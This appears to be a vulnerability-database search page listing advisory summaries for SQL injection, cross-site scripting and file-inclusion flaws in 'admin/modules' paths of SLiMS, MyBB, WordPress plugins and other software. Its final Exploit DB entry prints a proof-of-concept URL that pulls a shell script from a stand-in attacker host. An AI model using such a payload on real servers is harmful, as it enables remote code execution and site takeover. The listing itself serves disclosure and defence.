
52 matches found

OSV
added 2022/03/17 11:15 a.m., 12 views

CVE-2021-45791

Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/membertype.php, /admin/modules/system/usergroup.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users...

8.8 CVSS, 7.7 AI score, 0.00316 EPSS
Exploits: 1, References: 1

Prion
added 2022/03/17 11:15 a.m., 8 views

SQL injection

Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/membertype.php, /admin/modules/system/usergroup.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users...

6.5 CVSS, 9 AI score, 0.00316 EPSS
Exploits: 1, References: 1, Affected Software: 1

Cvelist
added 2022/03/17 10:55 a.m., 11 views

CVE-2021-45792

Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/customfield.php...

5.2 AI score, 0.00219 EPSS
Exploits: 1, References: 1

CVE
added 2022/03/17 10:35 a.m., 89 views

CVE-2021-45791

CVE-2021-45791 affects Slims8 Akasia 8.3.1. A SQL injection exists in multiple admin modules (bibliography, member_type, user_group, membership index) via the dir parameter, due to insufficient input escaping/validation. Exploitation is described as feasible by remotely authenticated librarian us...

8.8 CVSS, 9 AI score, 0.00316 EPSS
Exploits: 1, References: 1, Affected Software: 1

CNNVD
added 2022/03/17 12:00 a.m., 2 views

Slims8 Akasia SQL Injection Vulnerability

Slims8 Akasia is a software of the Slims community in Indonesia. It is used for library resource management e.g. books, journals, digital documents and other library materials and administration. An SQL injection vulnerability exists in Slims8 Akasia version 8.3.1, which stems from missing SQL...

8.8 CVSS, 6 AI score, 0.00316 EPSS
Exploits: 1, References: 2

NVD
added 2020/08/21 4:15 p.m., 7 views

CVE-2020-20633

ajax_policy_generator in admin/modules/cli-policy-generator/classes/class-policy-generator-ajax.php in GDPR Cookie Consent (cookie-law-info) 1.8.2 and below plugin for WordPress, allows authenticated stored XSS and privilege escalation...

5.4 CVSS, 5.3 AI score, 0.00382 EPSS
Exploits: 1, References: 1

Cvelist
added 2020/08/21 3:42 p.m., 12 views

CVE-2020-20633

ajax_policy_generator in admin/modules/cli-policy-generator/classes/class-policy-generator-ajax.php in GDPR Cookie Consent (cookie-law-info) 1.8.2 and below plugin for WordPress, allows authenticated stored XSS and privilege escalation...

5.2 AI score, 0.00382 EPSS
Exploits: 1, References: 1

CVE
added 2020/08/21 3:42 p.m., 56 views

CVE-2020-20633

CVE-2020-20633 affects the WordPress plugin GDPR Cookie Consent (cookie-law-info) versions 1.8.2 and earlier, via ajax_policy_generator in admin/modules/cli-policy-generator/classes/class-policy-generator-ajax.php. The vulnerability allows authenticated stored XSS and privilege escalation. The co...

5.4 CVSS, 5.1 AI score, 0.00382 EPSS
Exploits: 1, References: 1, Affected Software: 1

Drupal
added 2019/03/27 12:00 a.m., 15 views

Module Filter - Moderately critical - Cross site scripting - SA-CONTRIB-2019-042

This module enables you to filter the list of modules on the admin modules page, and organizes packages into vertical tabs. The module doesn't sufficiently escape HTML under the scenario leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that the...

5.8 AI score
Exploits: 0, References: 5

OSV
added 2018/06/22 3:29 p.m., 8 views

CVE-2018-12658

Reflected Cross-Site Scripting (XSS) exists in the Stock Take module in SLiMS 8 Akasia 8.3.1 via an admin/modules/stocktake/index.php?keywords= URI...

6.1 CVSS, 6.2 AI score
Exploits: 0, References: 1

Cvelist
added 2017/06/05 7:00 p.m., 19 views

CVE-2017-9443

BigTree CMS through 4.2.18 allows remote authenticated users to conduct SQL injection attacks via a crafted tables object in manifest.json in an uploaded package. This issue exists in core\admin\modules\developer\extensions\install\process.php and...

8.7 AI score, 0.00546 EPSS
Exploits: 1, References: 1

CNVD
added 2017/04/06 12:00 a.m., 1 views

SLiMS 7 Cendana Cross-Site Scripting Vulnerability

SLiMS 7 Cendana is an open source, free library management system. A cross-site scripting vulnerability exists in the admin/modules component in SLiMS 7 Cendana on 2017-03-23 and earlier. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML...

6.1 CVSS, 6.3 AI score, 0.00234 EPSS
Exploits: 0, References: 1

Prion
added 2017/03/23 7:59 p.m., 14 views

Cross site scripting

Multiple Cross-Site Scripting (XSS) were discovered in admin/modules components in SLiMS 7 Cendana through 2017-03-23: the keywords parameter to bibliography/checkoutitem.php, bibliography/dlprint.php, bibliography/item.php, bibliography/itembarcodegenerator.php, bibliography/printedcard.php,...

4.3 CVSS, 5.9 AI score, 0.00234 EPSS
Exploits: 0, References: 2, Affected Software: 1

Cvelist
added 2017/03/23 7:00 p.m., 20 views

CVE-2017-7242

Multiple Cross-Site Scripting (XSS) were discovered in admin/modules components in SLiMS 7 Cendana through 2017-03-23: the keywords parameter to bibliography/checkoutitem.php, bibliography/dlprint.php, bibliography/item.php, bibliography/itembarcodegenerator.php, bibliography/printedcard.php,...

6 AI score, 0.00234 EPSS
Exploits: 0, References: 2

CVE
added 2017/03/23 7:00 p.m., 42 views

CVE-2017-7242

CVE-2017-7242 is an XSS vulnerability in SLiMS 7 Cendana affecting multiple admin/modules components. The described flaws involve unsafely handling user-supplied input in the keywords parameter across several scripts (bibliography/checkout_item.php, bibliography/dl_print.php, bibliography/item.ph...

6.1 CVSS, 6 AI score, 0.00234 EPSS
Exploits: 0, References: 2, Affected Software: 1

CNVD
added 2016/11/03 12:00 a.m., 1 views

Command Execution Vulnerability in the datetime Parameter of the Mixcall Seat Management System

Mixcall seat management system is based on B/S architecture, the management personnel can directly log into the Mixcall seat management center through the computer, and view the detailed situation related to the seat personnel's voice services. A command execution vulnerability exists in the...

7.7 AI score
Exploits: 0, References: 1

NVD
added 2012/11/17 9:55 p.m., 12 views

CVE-2012-5909

SQL injection vulnerability in admin/modules/user/users.php in MyBB (aka MyBulletinBoard) 1.6.6 allows remote attackers to execute arbitrary SQL commands via the conditionsusergroup parameter in a search action to admin/index.php...

7.5 CVSS, 8.3 AI score, 0.00926 EPSS
Exploits: 1, References: 4

Cvelist
added 2012/07/12 9:00 p.m., 18 views

CVE-2012-3998

Multiple SQL injection vulnerabilities in Sticky Notes before 0.2.27052012.5 allow remote attackers to execute arbitrary SQL commands via the (1) paste id in admin/modules/modpastes.php or (2) show.php, (3) user id to admin/modules/modusers.php, (4) project to list.php, or (5) session id to show.php...

8.4 AI score, 0.00362 EPSS
Exploits: 1, References: 4

Prion
added 2010/06/02 6:30 p.m., 10 views

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in Open Education System (OES) 0.1 beta allow remote attackers to execute arbitrary PHP code via a URL in the CONFINCLUDEPATH parameter to (1) forum/admin.php and (2) plotgraph/index.php in admin/modules/modules/, and (3) adminuser/modadmuser.php and (4)...

7.5 CVSS, 7.8 AI score, 0.02735 EPSS
Exploits: 2, References: 3, Affected Software: 1

Exploit DB
added 2009/11/24 12:00 a.m., 30 views

NukeHall 0.3 - Multiple Remote File Inclusions

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...

7.4 AI score
Exploits: 0